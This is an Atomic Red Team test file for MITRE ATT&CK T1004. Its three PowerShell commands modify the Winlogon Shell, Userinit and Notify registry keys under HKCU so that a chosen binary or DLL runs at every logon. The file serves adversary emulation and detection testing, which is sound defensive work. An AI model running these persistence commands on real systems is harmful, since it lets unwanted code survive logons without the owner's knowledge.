atomic-red-team/atomics/T1004/T1004.yaml

---
attack_technique: T1004
display_name: Winlogon Helper DLL

atomic_tests:
- name: Winlogon Shell Key Persistence - PowerShell
  description: |
    PowerShell code to set Winlogon shell key to execute a binary at logon along with explorer.exe.

  supported_platforms:
    - windows

  input_arguments:
    binary_to_execute:
      description: Path of binary to execute
      type: Path
      default: C:\Windows\System32\cmd.exe

  executor:
    name: powershell
    elevation_required: false
    command: |
      Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force

- name: Winlogon Userinit Key Persistence - PowerShell
  description: |
    PowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe.

  supported_platforms:
    - windows

  input_arguments:
    binary_to_execute:
      description: Path of binary to execute
      type: Path
      default: C:\Windows\System32\cmd.exe

  executor:
    name: powershell
    elevation_required: false
    command: |
      Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force

- name: Winlogon Notify Key Logon Persistence - PowerShell
  description: |
    PowerShell code to set Winlogon Notify key to execute a notification package DLL at logon.

  supported_platforms:
    - windows

  input_arguments:
    binary_to_execute:
      description: Path of notification package to execute
      type: Path
      default: C:\Windows\Temp\atomicNotificationPackage.dll

  executor:
    name: powershell
    elevation_required: false
    command: |
      New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force
      Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" "logon" "#{binary_to_execute}" -Force